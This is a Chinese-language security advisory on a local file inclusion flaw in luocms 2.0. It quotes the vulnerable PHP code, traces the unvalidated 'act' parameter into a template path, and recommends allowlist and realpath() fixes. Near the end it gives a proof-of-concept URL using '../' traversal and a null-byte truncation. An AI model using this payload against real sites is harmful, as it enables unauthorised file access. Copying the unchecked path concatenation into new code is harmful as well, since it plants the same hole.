
luocms 2.0本地文件包含

2013-05-24 15:11
有点鸡肋
 
/*******************************************************/

/* luocms 2.0 Local File Inclusion Vulnerability

/* ========================

/* E-Mail : 681796@qq.com

/*========================

/*******************************************************/

/* Welcome to http://www.90sec.com */

/*******************************************************/


//首先看看首页
<?PHP
// Front-controller excerpt quoted by the write-up: it collects five request
// variables and passes them to cls_tpl::tpl_main, which renders the page.
require_once "inc/const.php";

$id = getvar("id"); // see the getvar function (its body is not shown on this page)
$fid = getvar("fid"); // assigned but not used anywhere in this excerpt
$cid = getvar("cid");
// NOTE(review): per the PoC later on the page, act comes from the query string.
// No validation is visible here before it is handed to tpl_main — confirm
// whether getvar filters anything.
$act = getvar("act");
$p = getvar("p");
$p = !empty($p) ? $p : 1; // fall back to 1 when p is empty

$p_l = new cls_tpl();
// $sitepath is not assigned in this excerpt; presumably set by inc/const.php — confirm.
$p_l->tpl_main($act,$id,$cid,$sitepath,$p);

?>


//跟入tpl_main 函数
/**
 * Renders one page: resolves the template path for $act via get_tpl, loads it
 * with load_tpl, passes the content through the get_* helpers below in order,
 * and echoes the result.
 *
 * $sitepath is accepted but not used in the body shown here. Of the helpers
 * called, only get_tpl is shown on this page.
 *
 * NOTE(review): $act reaches get_tpl and then load_tpl unchanged; this method
 * performs no validation of it.
 */
function tpl_main($act,$id,$cid,$sitepath,$p){
//$stime=microtime(true); // record the time at which execution starts
$tpl_addr = $this->get_tpl($act); // path is built directly from the caller-supplied $act
$temp = $this->load_tpl($tpl_addr);
$temp = $this->get_include_file($temp);// the write-up marks this call as where the file inclusion occurs
$temp = $this->get_sys_tag($temp,$id,$cid);
$temp = $this->get_list_tag($temp,$id,$cid,$p);
$temp = $this->get_url_path($temp);
$temp = $this->get_sort_tag($temp,$id,$cid);
$temp = $this->get_title_tag($temp,$id);
$temp = $this->get_sitepath($temp,$act,$id,$cid);
// The content and previous/next passes run only when an id was supplied.
if ($id != ""){
$temp = $this->get_content_content($temp,$id);
$temp = $this->get_prv_next($temp,$id);
}
echo $temp;
//$etime=microtime(true);// record the time at which execution ends
//$total=$etime-$stime; // compute the difference
//echo "<br />$total times";
}

//跟入get_tpl函数
/**
 * Builds the template file path for the requested action.
 *
 * Returns templatedir . $act . rewriteext when $act is not loosely equal to
 * the empty string, otherwise templatedir . indextemplate.
 *
 * NOTE(review): $act is concatenated into the path with no validation in this
 * method, so "../" segments in it resolve outside the template directory.
 * Accept only an allowlisted name (for example letters, digits, underscore)
 * and confirm that the resolved path still sits under templatedir before the
 * file is loaded.
 */
function get_tpl($act){
if ($act != "") {
// The array keys are written without quotes (bare constants). Unless constants
// of those names are defined, PHP 8 raises an Error here; quote the keys when porting.
$temp = $GLOBALS[templatedir].$act.$GLOBALS[rewriteext];
}else{
// No action requested: use the configured index template.
$temp = $GLOBALS[templatedir].$GLOBALS[indextemplate];
}
return $temp;
}
//$GLOBALS[templatedir].$act.$GLOBALS[rewriteext]; 看看赋值

// Site configuration values quoted by the write-up; the page does not name the
// file they come from. get_tpl reads templatedir, rewriteext and indextemplate
// through $GLOBALS.
$installdir = "";
$templatedir = 'template/'; // prefix of every template path built by get_tpl
$databasePrefix = "luo_";
$indexname = "LUOCMS首页";
$indextemplate = 'index.html'; // template used when no act is supplied
$httpurl = "http://127.0.0.1/lUOCMS_UTF8_V2.0.101201/upload/";
$defaultext = 'html';
$sitepathsplit = ' > ';
$titlepathsplit = ' - ';
$rewriteext = '.html'; // suffix appended after $act by get_tpl
$author = "Admin";
$source = "本站";
$site_beian = "123456";
$manager_email = "admin@luocms.com";
$sysversion = "V2.0.101108_UTF8";
$issetup = "0";

//ok template/$act.html $act 可控 产生包含

 

 
poc: http://www.luocms.com/index.php?act=../upload/file/3.txt%00 
 
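修复方案:

过滤 act 参数:在拼接模板路径之前做白名单校验,只接受字母、数字、下划线和连字符,拒绝包含 `/`、`\`、`..` 或空字节的取值;拼接后再用 realpath() 确认最终路径仍位于 template/ 目录内,否则直接返回错误。PoC 中的 %00 截断只在 PHP 5.3.4 之前的版本有效,升级 PHP 能阻止截断,但目录穿越本身仍需按上述方式在代码中修复。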
 


知识来源: www.2cto.com/Article/201305/214040.html
